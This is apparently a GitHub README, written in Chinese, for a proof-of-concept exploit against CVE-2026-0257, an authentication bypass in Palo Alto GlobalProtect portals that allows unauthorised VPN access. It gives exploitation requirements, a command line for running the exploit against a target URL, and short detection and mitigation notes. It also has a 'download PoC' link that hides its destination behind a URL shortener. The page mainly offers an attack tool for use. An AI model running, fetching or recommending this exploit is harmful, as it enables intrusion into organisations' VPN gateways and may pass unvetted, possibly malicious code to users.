jenniferreire26/CVE-2026-0257

# CVE-2026-0257 - GlobalProtect portal 身份验证绕过 **严重程度：** 严重 **CVSS：** 9.1 **影响：** 机密性、完整性 **发布日期：** 2026-05-13 ## 法律声明 仅供授权的安全测试使用。 ## 根本原因（简述） Palo Alto Networks PAN-OS® 软件的 GlobalProtect portal 和 gateway 中存在的身份验证绕过漏洞，允许攻击者绕过安全限制并建立未经授权的 VPN 连接。 Panorama 和 Cloud NGFW 不受此问题影响。 ## 利用要求 - 可访问的易受攻击目标 - 可预测的用户/工作流上下文 - 没有阻止恶意构造请求的额外加固措施 ## 使用方法 ``` python3 exploit.py https://target.tld ``` ## 检测 - 监控可疑的身份验证流程偏差 - 调查与 CVE-2026-0257 相关的异常 endpoint 直接命中 ## 缓解措施 - 更新至厂商已修复的版本 - 限制高风险 endpoint，并尽可能强制实施 MFA ## 漏洞利用 [下载 PoC](https://tinyurl.com/287cjwar)

标签：Python, VPN, 无后门, 身份认证绕过, 逆向工具